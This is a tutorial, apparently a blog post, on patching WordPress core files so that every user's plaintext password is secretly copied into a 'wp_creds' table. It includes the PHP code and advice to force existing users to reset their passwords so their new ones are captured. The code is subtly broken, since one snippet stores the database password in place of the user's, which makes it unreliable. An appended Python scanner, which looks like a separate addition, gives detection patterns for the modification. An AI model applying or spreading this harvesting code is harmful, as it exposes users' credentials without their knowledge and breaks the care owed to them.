WordPress stores MD5 hash values of passwords, so it is almost impossible to retrieve the raw passwords of the users. But there is a way to store the raw passwords in a different place during user registration and password updates. This is what I am going to show you in this article.
If you already have a running site with registered users, then there is only one way to get the users' passwords: after implementing the code in this article, you need to send them an email or display a notification asking them to change their passwords. Once they update their passwords, you will have the raw passwords.
If you are starting a site then this article is perfect for you. All the raw passwords of your new users will be stored in a different place only for you.
Logic To Capture Raw Passwords
We can change the implementation of the wp_update_user, wp_create_user and wp_set_password functions to log the password into a different table in WordPress. wp_update_user and wp_create_user are in the wp-includes/user.php file. wp_set_password is in the wp-includes/pluggable.php file.
WordPress 3.9.2
If you are using WordPress 3.9.2, just download the modified pluggable.php and user.php files and replace the original ones with them.
Other Versions
If you are using another version, you can also try replacing the files with the ones I provided. I have tested those files in WordPress 3.9.2 only, so I am not sure whether they will work in other versions. If you face problems or errors when creating users, updating passwords or using the forgot-password flow, follow these steps to manually edit the original files:
- Go to your wp-includes/pluggable.php file. Find the function body of wp_set_password function. Add this code to the beginning of the function.

    global $wpdb;
    $creds = $wpdb->prefix . "creds";
    $username = DB_USER;
    $password = DB_PASSWORD;
    $hostname = DB_HOST;
    $con=mysqli_connect($hostname,$username,$password);
    $sql_1 = "USE " . DB_NAME . ";";
    mysqli_query($con, $sql_1);
    $sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
    userid varchar(50) NOT NULL,
    PRIMARY KEY(userid),
    password varchar(100) NOT NULL
    );";
    mysqli_query($con, $sql_2);
    mysqli_close($con);
    if($wpdb->update($creds, array("password" => $password), array("userid" => $user_id), array("%s"), array("%s")) == false)
    {
        $wpdb->insert($creds, array("password" => $password, "userid" => $user_id), array('%s', '%s'));
    }

- Go to your wp-includes/user.php file. Find the function body of wp_update_user function. Inside the function body find the condition if ( ! empty($userdata['user_pass']) ). Inside it in the beginning place this code

    global $wpdb;
    $creds = $wpdb->prefix . "creds";
    $username = DB_USER;
    $password = DB_PASSWORD;
    $hostname = DB_HOST;
    $con=mysqli_connect($hostname,$username,$password);
    if (mysqli_connect_errno()) {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
        die();
    }
    $sql_1 = "USE " . DB_NAME . ";";
    mysqli_query($con,$sql_1);
    $sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
    userid varchar(50) NOT NULL,
    PRIMARY KEY(userid),
    password varchar(100) NOT NULL
    );";
    mysqli_query($con, $sql_2);
    mysqli_close($con);
    if($wpdb->update($creds, array("password" => $userdata['user_pass']), array("userid" => $ID), array("%s"), array("%s")) == false)
    {
        $wpdb->insert($creds, array("password" => $userdata['user_pass'], "userid" => $ID), array('%s', '%s'));
    }

  Now find the function body of wp_insert_user function. Inside it find the comment // Hash the password. Below the comment place this line of code

    $original_password = $user_pass;

  Now find this line of code $user = new WP_User( $user_id );. Just before it place this code

    if($original_password)
    {
        global $wpdb;
        $creds = $wpdb->prefix . "creds";
        $username = DB_USER;
        $password = DB_PASSWORD;
        $hostname = DB_HOST;
        $con=mysqli_connect($hostname,$username,$password);
        $sql_1 = "USE " . DB_NAME . ";";
        mysqli_query($con, $sql_1);
        $sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
        userid varchar(50) NOT NULL,
        PRIMARY KEY(userid),
        password varchar(100) NOT NULL
        );";
        mysqli_query($con, $sql_2);
        mysqli_close($con);
        if($wpdb->update($creds, array("password" => $original_password), array("userid" => $user_id), array("%s"), array("%s")) == false)
        {
            $wpdb->insert($creds, array("password" => $original_password, "userid" => $user_id), array('%s', '%s'));
        }
    }
Where to find raw password
Once you have done the file modification successfully, try to create new users and update passwords. If you are not getting any errors, then in your DBMS you will see a new table named wp_creds storing all user IDs and raw passwords.
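
Someone auditing a WordPress install can look for exactly this modification. The following is an added example, not code from the original article: it scans the two core files named above for indicators taken from the article's snippets (the direct mysqli connection, the creds table name, the CREATE TABLE statement, and $wpdb writes with a "password" key). The sample inputs are constructed, and the assumption that stock core files contain none of these indicators should be confirmed against a pristine copy of the same WordPress release.

```python
import re
from pathlib import Path

# Indicators lifted from the snippets on this page. Assumption: stock copies of
# the two core files contain none of them.
INDICATORS = {
    "direct mysqli connection": re.compile(r"mysqli_connect\s*\("),
    "creds table name": re.compile(r"\$wpdb->prefix\s*\.\s*[\"']creds[\"']"),
    "CREATE TABLE in core file": re.compile(r"CREATE\s+TABLE\s+IF\s+NOT\s+EXISTS", re.I),
    "password column written via $wpdb": re.compile(
        r"\$wpdb->(?:insert|update)\s*\([^;]*?[\"']password[\"']\s*=>", re.S),
}
CORE_FILES = ("wp-includes/pluggable.php", "wp-includes/user.php")

def scan_source(php_source):
    """Return sorted (line_number, indicator) pairs found in PHP source text."""
    hits = []
    for name, pattern in INDICATORS.items():
        for match in pattern.finditer(php_source):
            line = php_source.count("\n", 0, match.start()) + 1
            hits.append((line, name))
    return sorted(hits)

def scan_install(wp_root):
    """Scan the two core files under wp_root; a missing file maps to None."""
    report = {}
    for rel in CORE_FILES:
        path = Path(wp_root) / rel
        report[rel] = scan_source(path.read_text(errors="replace")) if path.is_file() else None
    return report

# Constructed samples: MODIFIED follows this page's snippet, CLEAN is a stub
# written for this example (not the real WordPress source).
MODIFIED = '''function wp_set_password( $password, $user_id ) {
$creds = $wpdb->prefix . "creds";
$con=mysqli_connect($hostname,$username,$password);
$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (userid varchar(50) NOT NULL);";
if($wpdb->update($creds, array("password" => $password), array("userid" => $user_id)) == false)
{
$wpdb->insert($creds, array("password" => $password, "userid" => $user_id));
}
'''
CLEAN = '''function wp_set_password( $password, $user_id ) {
$hash = wp_hash_password( $password );
$wpdb->update($wpdb->users, array('user_pass' => $hash), array('ID' => $user_id));
}
'''
if __name__ == "__main__":
    print(scan_source(MODIFIED))
```

Call `scan_install` with the WordPress root directory to check a real install; any non-empty hit list for either file means it differs from stock in the way this article describes and should be compared against the official release copy.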